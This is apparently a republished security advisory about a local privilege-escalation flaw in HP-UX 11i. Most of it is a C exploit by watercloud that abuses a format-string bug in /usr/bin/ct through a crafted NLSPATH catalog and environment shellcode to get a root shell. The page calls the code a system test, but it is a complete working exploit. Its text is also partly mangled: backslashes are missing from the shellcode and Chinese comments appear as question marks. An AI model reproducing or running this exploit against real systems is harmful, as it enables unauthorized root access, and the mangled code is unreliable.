‘HP-UX libc NLSPATH Environment Variable Privilege Elevation (Exploit)’

Summary

‘As we reported in our previous article HP-UX libc NLSPATH Environment Variable Privilege Elevation Vulnerability, a locally exploitable buffer overflow in the program allows local users to gain elevated privileges. The following exploit code can be used to test your system for the mentioned vulnerability.’

Credit:

‘The information has been provided by watercloud.’


Details

Exploit:
/***********************************************************************
* File : x_hp-ux11i_nls_ct.c
* Usage : cc x_hp-ux11i_nls_ct.c -o x_ct ; ./x_ct
* Purpose :
* HP-UX??????????????/usr/bin/ct?????????????????root???
* Get a local rootshell from /usr/bin/ct,using HP-UX location language format string bug.
* Author : watercloud@xfocus.org
* Date : 2003-1-4
* Tested : On HP-UX B11.11 .
* Note : Use as your risk!
* Site : http://www.xfocus.org (EN)
* http://www.xfocus.net (CN)
***********************************************************************/

#include<stdio.h>

#define PATH ‘PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin’
#define TERM ‘TERM=xterm’
#define NLSPATH ‘NLSPATH=/tmp/.ex.cat’

#define CMD ‘/usr/bin/ct abc_ ‘
#define MSG ‘$set 1n1128 ‘
#define PRT_ARG_NUM 2
#define STACK_LEN 0x180

#define ENV_BEGIN 0x40
#define ENV_LEN 0x40
#define LOW_STACK 0x210

char buffer[512];
char buff[72]=
  ‘x0bx5ax02x9ax34x16x03xe8x20x20x08x01xe4x20xe0x08’
  ‘x96xd6x04x16xebx5fx1fxfdx0bx39x02x99xb7x5ax40x22’
  ‘x0fx40x12x0ex20x20x08x01xe4x20xe0x08xb4x16x70x16’
  ‘/bin/shA’;
int * pint = (int *) &buff[56];
unsigned int haddr = 0;
unsigned int dstaddr = 0;

int main(argc,argv,env)
int argc;char ** argv;char **env;
{
    unsigned int * pa = (unsigned int*)env;
    FILE * fp = NULL;
    int xnum = (LOW_STACK – ENV_BEGIN + STACK_LEN -56 -12 -36 -PRT_ARG_NUM*4)/4;

    int alig1= ENV_BEGIN – xnum*8;
    int alig2=0;
    int i=0;

    while(*pa != NULL)
        *pa++=0;
    
    if(strlen(CMD) >ENV_BEGIN-3)
    {
        printf(‘No enough space to alig our env!n’);
        exit(1);
    }

printf(‘Exploite for HP-UX 11i NLS format bug by command ct.n’);
printf(‘From watercloud@xfocus.org. 2003-1-4n’);
printf(‘ Site : http://www.xfocus.net (CN).n’);
printf(‘ Site : http://www.xfocus.org (EN).n’);

    haddr = (unsigned int)&fp & 0xffff0000;
    if(alig1 < 0)
      alig1+=0x10000;
    alig2 = (haddr >> 16) – alig1 -xnum*8 ;
    if(alig2 < 0)
      alig2+=0x10000;

    dstaddr= haddr+ LOW_STACK + STACK_LEN -24;
    *pint++=dstaddr;
    *pint++=dstaddr;
    *pint++=dstaddr;
    *pint = 0;
    
    /* begin to make our .cat file */
    fp = fopen(‘/tmp/.ex.k’,’w’);
    if(fp == NULL)
    {
      printf(‘open file : /tmp/.ex.k for write error.n’);
      exit(1);
    }
    fprintf(fp,’%s’,MSG);
    for(;i<xnum;i++)
      fprintf(fp,’%%.8x’);
    fprintf(fp,’%%.%ix%%n’,alig1);
    fprintf(fp,’%%.%ix%%hn’,alig2);
    fclose(fp);
    fp = NULL;
    system(‘/usr/bin/gencat /tmp/.ex.cat /tmp/.ex.k’);
    unlink(‘/tmp/.ex.k’);

    sprintf(buffer,’TZ=%*s%s%*s’,ENV_BEGIN-3-strlen(CMD),’A’,buff,ENV_BEGIN+ENV_LEN-strlen(buff),’B’);
    putenv(buffer);
    putenv(PATH);
    putenv(TERM);
    putenv(NLSPATH);
    
    printf(‘??????????(Remember to delete the file): /tmp/.ex.cat .n’);
    execl(‘/usr/bin/ct’,’/usr/bin/ct’,’abc_’,0); /* ????? ?? */
} ‘

Categories: Exploits